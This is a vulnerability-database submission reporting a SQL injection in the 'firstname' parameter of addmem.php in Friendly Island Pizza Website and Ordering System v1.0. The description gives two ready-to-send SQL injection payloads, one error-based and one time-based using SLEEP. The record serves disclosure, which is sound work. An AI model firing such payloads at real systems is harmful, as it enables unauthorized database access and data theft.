Title | Friendly Island Pizza Website and Ordering System v1.0 /FriendlyIsPizzaWebsite/addmem.php post parameter firstname exists SQL injection vulnerability |
---|
Description | An issue was discovered in Friendly Island Pizza Website and Ordering System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /FriendlyIsPizzaWebsite/addmem.php post parameter 'firstname'.
Payload1:firstname=a' or (select 1 from(select count(*),concat(0x71727374,(select (elt(666=666,1))),0x61626364,floor(rand(0)*2))x from information_schema.plugins group by x)a) AND 'a'='a&lastname=b&email=c&pword=xB!7x!&ambot=d&number=1&house=e&street=f&city=g
Payload2:firstname=a' and (select 2 from (select(SLEEP(20)))b) AND 'a'='a&lastname=b&email=c&pword=xB!7x!&ambot=d&number=1&house=e&street=f&city=g |
---|
Source | ⚠️ https://github.com/AureliusLia/bug_report/blob/main/vendors/Skynidnine/Friendly%20Island%20Pizza%20Website%20and%20Ordering%20System/SQLi-1.md |
---|
User | dfgzxyz (ID 42942) |
---|
Submission | 2023-03-15 09時04分 (1 Year ago) |
---|
Moderation | 2023-03-15 16時10分 (7 hours later) |
---|
Status | 已接受 |
---|
VulDB Entry | 223127 |
---|